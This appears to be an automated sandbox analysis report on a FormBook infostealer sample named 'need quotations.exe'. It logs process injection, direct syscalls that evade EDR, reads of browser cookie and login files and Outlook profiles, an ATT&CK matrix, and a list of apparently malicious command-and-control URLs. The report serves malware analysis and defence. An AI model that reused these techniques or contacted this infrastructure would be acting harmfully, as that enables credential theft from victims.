Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036649D0 mov eax, dword ptr fs:[00000030h]	1_2_036649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_036FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036429A0 mov eax, dword ptr fs:[00000030h]	1_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]	1_2_036309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036309AD mov eax, dword ptr fs:[00000030h]	1_2_036309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B89B3 mov esi, dword ptr fs:[00000030h]	1_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]	1_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036B89B3 mov eax, dword ptr fs:[00000030h]	1_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]	1_2_036BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036BE872 mov eax, dword ptr fs:[00000030h]	1_2_036BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]	1_2_036C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_036C6870 mov eax, dword ptr fs:[00000030h]	1_2_036C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03642840 mov ecx, dword ptr fs:[00000030h]	1_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03660854 mov eax, dword ptr fs:[00000030h]	1_2_03660854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]	1_2_03634859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03634859 mov eax, dword ptr fs:[00000030h]	1_2_03634859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]	1_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]	1_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]	1_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03652835 mov ecx, dword ptr fs:[00000030h]	1_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03652835 mov eax, dword ptr fs:[00000030h]	1_2_03652835

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0027A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_0027A66C

Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_002681AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_002681AC
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00268189 SetUnhandledExceptionFilter,		0_2_00268189

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\need quotations.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rasdial.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: NULL target: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: NULL target: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\rasdial.exe

Thread register set: target process: 6236

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\need quotations.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 80A008

Jump to behavior

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0027B106 LogonUserW,

0_2_0027B106

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_00243D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00243D19

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0028411C SendInput,keybd_event,

0_2_0028411C

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_002874BB mouse_event,

0_2_002874BB

Source: C:\Users\user\Desktop\need quotations.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\need quotations.exe"	Jump to behavior
Source: C:\Program Files (x86)\qWxmalArsooGnMtnTypABgTGgItjlIIIFfPknJrKRHXAdhaF\hyAHqPRvnfCBI.exe	Process created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\need quotations.exe

0_2_0027A66C

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_002871FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_002871FA

Source: need quotations.exe, hyAHqPRvnfCBI.exe, 00000005.00000002.4141886463.0000000001200000.00000002.00000001.00040000.00000000.sdmp, hyAHqPRvnfCBI.exe, 00000005.00000000.1906831561.0000000001200000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4141886463.0000000001200000.00000002.00000001.00040000.00000000.sdmp, hyAHqPRvnfCBI.exe, 00000005.00000000.1906831561.0000000001200000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: need quotations.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4141886463.0000000001200000.00000002.00000001.00040000.00000000.sdmp, hyAHqPRvnfCBI.exe, 00000005.00000000.1906831561.0000000001200000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: hyAHqPRvnfCBI.exe, 00000005.00000002.4141886463.0000000001200000.00000002.00000001.00040000.00000000.sdmp, hyAHqPRvnfCBI.exe, 00000005.00000000.1906831561.0000000001200000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_002665C4 cpuid

0_2_002665C4

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0029091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_0029091D

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_002BB340 GetUserNameW,

0_2_002BB340

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_00271E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00271E8E

Source: C:\Users\user\Desktop\need quotations.exe

Code function: 0_2_0025DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0025DDC0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4145847136.0000000006A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4142028944.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4141916855.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1982709060.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1982943368.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4140969114.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1983616286.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4142229075.0000000002950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\rasdial.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\rasdial.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: need quotations.exe	Binary or memory string: WIN_81
Source: need quotations.exe	Binary or memory string: WIN_XP
Source: need quotations.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: need quotations.exe	Binary or memory string: WIN_XPe
Source: need quotations.exe	Binary or memory string: WIN_VISTA
Source: need quotations.exe	Binary or memory string: WIN_7
Source: need quotations.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.4145847136.0000000006A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4142028944.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4141916855.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1982709060.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1982943368.0000000002DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4140969114.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1983616286.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.4142229075.0000000002950000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_00298C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00298C4F
Source: C:\Users\user\Desktop\need quotations.exe	Code function: 0_2_0029923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_0029923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	3 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
need quotations.exe	34%	ReversingLabs	Win32.Trojan.AutoitInject
need quotations.exe	29%	Virustotal		Browse
need quotations.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.trendave.xyz/nhcb/?xDq=Jt/EBXmNn0Xont3Uq3SrNJmrJY3M4cpFu0H2rr3BW2spn453uaHrewE12DuyPcurf4Mzbuz0WqMTaNbmObgJIgyyiHGSgJZQh0vowHWBwbWi8nXeO4OBSJo=&Lhx=fPAh7htHyFPl-	0%	Avira URL Cloud	safe
https://www.hover.com/email?source=parked	0%	Avira URL Cloud	safe
http://www.egldfi.xyz/3e55/	0%	Avira URL Cloud	safe
https://www.hover.com/about?source=parked	0%	Avira URL Cloud	safe
http://www.lgdiamonds.info/cv1w/	0%	Avira URL Cloud	safe
http://www.bcg.services/5onp/	0%	Avira URL Cloud	safe
http://www.127358.win/qn33/	0%	Avira URL Cloud	safe
http://www.bcg.services/5onp/?xDq=YQtAzQFhELh+NSSrGqCNnhce8BNGqUHm8iHa4W14s/j18xx0uDy8MYWH0B9/yw3XqDLZco6qWp6tHax8xys+UQeEteLMn8uXkqbvRDHjk1GU4HyortJJJ3Q=&Lhx=fPAh7htHyFPl-	0%	Avira URL Cloud	safe
http://www.127358.win/qn33/?xDq=99NzBUOu8EtmiwHLkwkwM6CtLEWWEZ390ZejPygVUj3ypAzbuWBUlAjLLmpNciJuv0EF7eUmh88cLf0Gn8IRd668KNerATnE+FhfiYpUJ+CuKGzT26uc/xk=&Lhx=fPAh7htHyFPl-	0%	Avira URL Cloud	safe
http://www.rtpwslot888gol.sbs/jmkz/	0%	Avira URL Cloud	safe
https://www.hover.com/domains/results	0%	Avira URL Cloud	safe
https://adm.tools/?page=5	0%	Avira URL Cloud	safe
http://www.lgdiamonds.info/cv1w/?xDq=KIRaABhBgujzn3KVjNCYdeU2jI4CiDZHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDesRP/SoiJcG7UzeyTKHH5ghDsthQpYxENiFA=&Lhx=fPAh7htHyFPl-	0%	Avira URL Cloud	safe
http://www.trendave.xyz/nhcb/	0%	Avira URL Cloud	safe
http://www.rafconstrutora.online/0xli/?xDq=fiwXgneLShVjQCrL4aAUmgr67nbTTs+FPQo9HslC8d9LCicIVxdgVPkWu4N9YPZNTEC7g2Z77mR61ZpsKE291b6+nh6+OhPQfROIutba2cindDDWBeD84Ws=&Lhx=fPAh7htHyFPl-	0%	Avira URL Cloud	safe
http://www.jalan2.online/lvda/?Lhx=fPAh7htHyFPl-&xDq=ELDSXX2RsHX+gMhA2PfNyBEKowNIoqU7uMJ0P3epR9C3wBGcH3Oc/iCy84j3rr0M4JJUpyIPXVKNA8OpCuWYmMQdGJQpdXCyyNvs5R5nS90nKpkFpzjMZ1A=	0%	Avira URL Cloud	safe
http://www.betmatchx.online/bnd1/	0%	Avira URL Cloud	safe
http://www.75178.club/vl4d/?xDq=QHNq3VljPHXHL8Z+m/91IyVktX2l1Liqr4baOeL+2A69zWcjzNULNYjIURgj3Svvwd9B+/BgHSW8C8HA7Jym2iV1w40c0QsDnhpOyo2cx9iWMgjuEVKoVLw=&Lhx=fPAh7htHyFPl-	0%	Avira URL Cloud	safe
